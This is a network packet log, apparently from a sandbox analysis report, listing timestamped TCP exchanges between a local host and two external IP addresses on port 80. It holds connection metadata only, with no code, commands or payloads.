Jul 27, 2024 07:43:53.086966991 CEST	80	62243	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:53.089072943 CEST	80	62243	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:53.089191914 CEST	62243	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:53.089236021 CEST	62243	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:53.091779947 CEST	62244	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:53.094094038 CEST	80	62243	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:53.096565962 CEST	80	62244	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:53.096635103 CEST	62244	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:53.096755981 CEST	62244	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:53.096772909 CEST	62244	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:53.101541996 CEST	80	62244	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:53.101861000 CEST	80	62244	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:54.137245893 CEST	80	62244	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:54.137595892 CEST	80	62244	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:54.137676954 CEST	62244	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:54.137763023 CEST	62244	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:54.140254974 CEST	62246	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:54.143060923 CEST	80	62244	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:54.145431995 CEST	80	62246	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:54.145514965 CEST	62246	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:54.145603895 CEST	62246	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:54.145603895 CEST	62246	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:54.150625944 CEST	80	62246	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:54.150635958 CEST	80	62246	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:55.209892035 CEST	80	62246	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:55.209944963 CEST	80	62246	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:55.210776091 CEST	62246	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:55.210860014 CEST	62246	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:55.213644981 CEST	62247	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:55.215787888 CEST	80	62246	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:55.218631983 CEST	80	62247	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:55.218700886 CEST	62247	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:55.218795061 CEST	62247	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:55.218807936 CEST	62247	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:55.223640919 CEST	80	62247	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:55.223807096 CEST	80	62247	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:56.291183949 CEST	80	62247	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:56.291230917 CEST	80	62247	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:56.291405916 CEST	62247	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:56.292074919 CEST	62247	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:43:56.294646978 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:56.296937943 CEST	80	62247	186.145.236.93	192.168.2.4
Jul 27, 2024 07:43:56.299614906 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.299695015 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:56.299813986 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:56.304620981 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.878726959 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.878774881 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.878810883 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.878846884 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.878844023 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:56.878885984 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.878917933 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:56.878920078 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.878956079 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.878964901 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:56.878992081 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.879025936 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.879036903 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:56.879064083 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.879106045 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:56.886686087 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.886720896 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.886756897 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.886856079 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:56.965543032 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.965591908 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.965627909 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.965646029 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:56.965698957 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.965749025 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:56.965754032 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.965795040 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.965830088 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.965862989 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.965872049 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:56.965903044 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.965907097 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:56.966449022 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.966466904 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.966483116 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.966485977 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:56.966506958 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.966521978 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.966526031 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:56.966561079 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:56.967238903 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.967255116 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.967281103 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.967295885 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.967297077 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:56.967313051 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.967336893 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:56.968106985 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.968136072 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.968152046 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.968153000 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:56.968193054 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:56.968220949 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.970793009 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.970819950 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:56.970840931 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.021579027 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.055818081 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.055890083 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.055927992 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.055960894 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.055959940 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.055995941 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.056011915 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.056030989 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.056066036 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.056076050 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.056118965 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.056153059 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.056185007 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.056185961 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.056233883 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.056242943 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.056276083 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.056308985 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.056323051 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.056341887 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.056376934 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.056391001 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.056411028 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.056444883 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.056452990 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.056513071 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.056565046 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.056648016 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.056845903 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.056879044 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.056901932 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.056914091 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.056946993 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.056957960 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.056982040 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.057014942 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.057037115 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.057049036 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.057081938 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.057086945 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.057116032 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.057163954 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.057502031 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.057554960 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.057589054 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.057605982 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.057622910 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.057670116 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.057677031 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.057709932 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.057744980 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.057758093 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.057780981 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.057815075 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.057828903 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.057849884 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.057885885 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.057898998 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.058823109 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.058871984 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.058873892 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.058908939 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.058943033 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.058948994 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.058978081 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.059011936 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.059029102 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.059046030 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.059079885 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.059088945 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.099706888 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.142679930 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.142796993 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.142851114 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.142877102 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.142904043 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.142939091 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.142950058 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.142972946 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.143008947 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.143021107 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.143042088 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.143093109 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.143094063 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.143126011 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.143160105 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.143182039 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.143193960 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.143228054 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.143243074 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.143260956 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.143296003 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.143312931 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.143328905 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.143368959 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.143374920 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.143400908 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.143439054 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.143451929 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.143476009 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.143510103 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.143532991 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.143563986 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.143599033 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.143610954 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.143631935 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.143673897 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.143682957 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.143728018 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.143774986 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.143783092 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.143815994 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.143848896 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.143862009 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.143881083 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.143914938 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.143938065 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.143946886 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.143982887 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.143991947 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.144017935 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.144067049 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.144351959 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.144403934 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.144438982 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.144453049 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.144470930 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.144541979 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.144547939 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.144581079 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.144614935 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.144639969 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.144648075 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.144681931 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.144695044 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.144717932 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.144750118 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.144764900 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.144787073 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.144819975 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.144828081 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.144855022 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.144890070 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.144902945 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.145225048 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.145277977 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.145292997 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.145330906 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.145365953 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.145400047 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.145411015 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.145437956 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.145448923 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.145492077 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.145534992 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.145545959 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.145580053 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.145612001 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.145637035 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.145646095 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.145680904 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.145694971 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.145714998 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.145749092 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.145762920 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.145788908 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.145832062 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.146317005 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.146439075 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.146488905 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.146497965 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.146522999 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.146574020 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.146586895 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.146610975 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.146644115 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.146675110 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.146681070 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.146720886 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.146735907 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.146770000 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.146804094 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.146816969 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.146838903 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.146872044 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.146884918 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.146907091 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.146943092 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.146953106 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.147145987 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.147193909 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.230211973 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.230309010 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.230369091 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.230422020 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.230433941 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.230458975 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.230503082 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.230547905 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.230582952 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.230622053 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.230674028 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.230725050 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.230736017 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.230761051 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.230791092 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.230798960 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.230838060 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.230860949 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.230889082 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.230931044 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.230940104 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.230983973 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.231018066 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.231033087 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.231050968 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.231086016 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.231092930 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.231137991 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.231190920 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.231194973 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.231225014 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.231260061 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.231277943 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.231292963 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.231328011 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.231353998 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.231363058 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.231396914 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.231409073 CEST	62248	80	192.168.2.4	64.190.113.113
